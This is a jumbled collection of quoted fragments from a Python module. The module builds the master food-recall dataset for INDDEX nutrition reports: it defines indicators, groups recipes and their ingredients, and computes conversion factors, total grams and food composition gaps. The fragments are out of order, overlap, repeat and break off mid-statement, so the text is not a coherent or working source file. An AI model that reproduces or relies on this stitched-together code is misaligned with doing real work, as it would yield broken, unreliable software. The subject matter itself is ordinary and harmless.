"I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug:",
"[] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids())",
"(STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction",
"or EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES()",
"class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring for",
"= FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE,",
"get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG:",
"else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams =",
"request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod",
"[recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if",
"== STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient cases",
"it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams =",
"self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type",
"domain, *, datespan, filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS:",
"FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for",
"row-wise calculations and indicator definitions. \"\"\" import operator import uuid from collections import",
"in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val",
"NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else:",
"they mention results in the creation of a \"food\" case that's a child",
"definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert",
"IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR,",
"False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows",
"= _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None",
"for row-wise calculations and indicator definitions. \"\"\" import operator import uuid from collections",
"import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as",
"'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k",
"\"recall\" session. This results in a \"foodrecall\" case. Every food they mention results",
"FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code':",
"IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR,",
"def _matches_in_memory_filters(self, row): # If a gap type is specified, show only rows",
"def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound",
"I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in",
"the recipe are entered as additional food cases and linked to the recipe",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR),",
"STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col",
"food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return",
"ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient ==",
"to the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We",
"ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc",
"NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code =",
".show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a",
"in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code =",
"filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls(",
"@property def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES: if",
"'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None):",
"self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\") class",
"else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in",
"columns reporting on what data is or isn't available. Some of these foods",
"row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes':",
"self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code:",
"= self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6',",
"slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr =",
"col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are",
"NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is",
"some values, insert them from the master recipe nsr_cols = {col: master_recipe[col] for",
"request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in",
"_multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val)",
"if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code",
"ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res",
"recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return",
"portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val",
"indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an indicator",
"IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams',",
"IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META),",
"'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group",
"from functools import reduce from memoized import memoized from corehq.apps.es import users as",
"from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from",
"beneficiary during a recall session. The ingredients of the recipe are entered as",
"if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def",
"get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified,",
"recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] =",
"these foods are recipes, and their ingredients appear as separate rows in the",
"FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META",
"= [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name",
"the UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if",
"elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return",
"IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR,",
"IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR,",
"for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request):",
"don't have a case of their own. Nonstandard recipes are defined by the",
"IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name',",
"case that's a child of this foodrecall. This dataset has a row for",
"by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than once, in",
"v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain,",
"to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more",
"self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row",
"IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc',",
"if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self):",
"from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps,",
"= slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE",
"in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete",
"a recipe, or it wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row,",
"in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't",
"self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code:",
"I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS}",
"values from the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield",
"} self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for",
"have a case of their own. Nonstandard recipes are defined by the user",
"elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc =",
"return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is",
"IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER),",
"IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR),",
"I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4',",
"master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking =",
"] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking',",
"else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from",
"it's an indicator that hasn't been explicitly set, check if it can #",
"I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'),",
"= 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in",
"row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid]",
"= {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try:",
"been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise",
"request), **{k: [v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS",
"unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\"",
"a \"food\" case that's a child of this foodrecall. This dataset has a",
"I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range',",
"IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR),",
"pieces and presents the result as a unified dataset. FoodRow :: Class responsible",
"self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe",
"master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount'])",
"total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] +",
"elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code))",
"logic to generate the master dataset for the INDDEX reports Overview -------- Beneficiaries",
"I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10',",
"gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code",
"'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid",
"row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self,",
"descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META),",
"= self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups =",
"this foodrecall. This dataset has a row for every food, with metadata about",
"food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return",
"_maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient):",
"bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code",
"return None else: # If it's an indicator in the UCR that hasn't",
"self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else:",
"I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'),",
"from the master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount",
"from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references:",
"recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients",
"= ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *,",
"row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name",
"= not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete",
"FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from",
"is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount *",
"has additional rows inserted for each ingredient. These rows are associated with the",
"specified, show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if",
"food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by",
"= bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code =",
"IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'),",
"Beneficiaries may report eating a nonstandard recipe more than once, in which case",
"FoodData :: This is the interface to this dataset, it glues together all",
"self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated:",
"the master recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount =",
"IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR,",
"= [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self,",
"ingredients again. We need to insert duplicates of the previously reported ingredients into",
"I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR,",
"return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references =",
"lookup table. This dataset has additional rows inserted for each ingredient. These rows",
"this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group",
"in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE)",
"rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def",
"I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR,",
"I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'),",
"IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META),",
"in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions)",
"\"\"\"Generates the primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS",
"from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from",
"TypeError: return None def _maybe_float(val): return float(val) if val not in (None, '')",
"self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis =",
"rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows",
"file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS +",
"about the recall session, calculated nutritional information, and auditing columns reporting on what",
"ingredients of the recipe are entered as additional food cases and linked to",
"ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients)",
"set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta =",
"'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures,",
"None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return",
"self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used =",
"owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def",
"self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code =",
"result as a unified dataset. FoodRow :: Class responsible for row-wise calculations and",
"def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return",
"self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections",
"AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside the scope",
"gap type is specified, show only rows with gaps of that type gap_type",
"I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER),",
"return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def",
"bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code =",
"}[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients):",
"ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for age_range in AGE_RANGES:",
"in a \"foodrecall\" case. Every food they mention results in the creation of",
"recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe']",
"IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be",
"cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for k in",
"recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid]",
"not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe =",
"raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row",
"IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR,",
"== 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed",
"functools import reduce from memoized import memoized from corehq.apps.es import users as user_es",
"self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE)",
"ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in",
"if it can # be pulled from the food fixture or from the",
"def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams,",
"recipes have their ingredients enumerated in the \"recipes\" lookup table. This dataset has",
"*, datespan, filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise",
